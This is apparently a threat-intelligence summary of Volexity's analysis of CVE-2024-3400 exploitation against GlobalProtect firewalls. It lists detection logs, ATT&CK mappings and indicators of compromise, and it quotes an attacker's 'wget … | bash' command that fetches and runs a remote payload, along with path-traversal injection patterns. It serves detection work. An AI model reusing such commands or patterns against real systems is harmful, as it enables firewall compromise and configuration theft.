Volexity analyzes CVE-2024-3400 exploitation against Palo Alto Networks GlobalProtect devices, detailing detection approaches, log-based indicators, and memory-forensics findings. The write-up attributes the activity to a threat actor tracked as UTA0218 and outlines reactive and proactive strategies to detect edge-device compromises.
Read more: https://www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/
Read more: https://www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/
Keypoints
- CVEs: CVE-2024-3400 was exploited in the GlobalProtect component of PAN-OS during in-the-wild attacks.
- Exfiltration of the firewall’s running configuration emerged as the most common post-exploitation activity across many organizations and regions.
- Early exploitation involved simple commands to place zero-byte files as a validation step for vulnerable devices.
- Exploitation uptick followed the advisory release and was associated with UTA0218 or other actors with early access to the exploit.
- Detection hinges on TSF/log analyses (gpsvc.log, md_out.log, device_telemetry_send.log, syslog-system.log, mp-monitor.log) and memory forensics.
- Memory-based indicators revealed artifacts such as base64/bash usage, suspicious binaries (/tmp/vpn_prot, /tmp/lowdp), and recovered bash history.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – CVE-2024-3400 was exploited in the GlobalProtect feature of PAN-OS to execute code remotely. “zero-day, in-the-wild exploitation of CVE-2024-3400 in the GlobalProtect feature of Palo Alto Networks PAN-OS by a threat actor … UTA0218.”
- [T1041] Exfiltration – Exfiltration of the firewall’s running configuration was the most commonly observed post-exploitation activity across devices. “Exfiltration of the firewall’s running configuration was the most commonly observed post-exploitation activity.”
- [T1059.004] Unix Shell – Use of base64 and bash during command execution and payload weaponization. “base64, bash, or echo” as malicious command keywords.
- [T1105] Ingress Tool Transfer – Downloading of additional payloads via wget and related commands observed in logs. “wget -qO- http://172.233.228.93/policy | bash”
- [T1053.005] Scheduled Task/Job – Persistence via cron.d scripts used to fetch and execute payloads. “cron.d script for persistence and downloading of additional payloads via wget.”
- [T1059.001] Command and Scripting Interpreter – Bash-based execution and scripted command chains observed in memory and logs. “bash” and related command sequences observed in multiple log entries.
Indicators of Compromise
- [IP] context – 172.233.228.93 – used to fetch policy and engage in post-exploitation communications (e.g., http://172.233.228.93/policy, 172.233.228.93:8443)
- [File] context – /tmp/vpn_prot, /tmp/lowdp – suspicious binaries observed in memory and on disk during investigations
- [Process] context – wget, bash – processes seen in cron-driven or scripted download/payload execution
- [Log/Entry] context – unmarshal session entries in gpsvc.log with path traversal and command-injection patterns (e.g., …unmarshal session(.././../…/opt/panlogs/tmp/device_telemetry/…); map , EOF)
- [File] context – update script and related cron-based persistence artifacts recovered from disk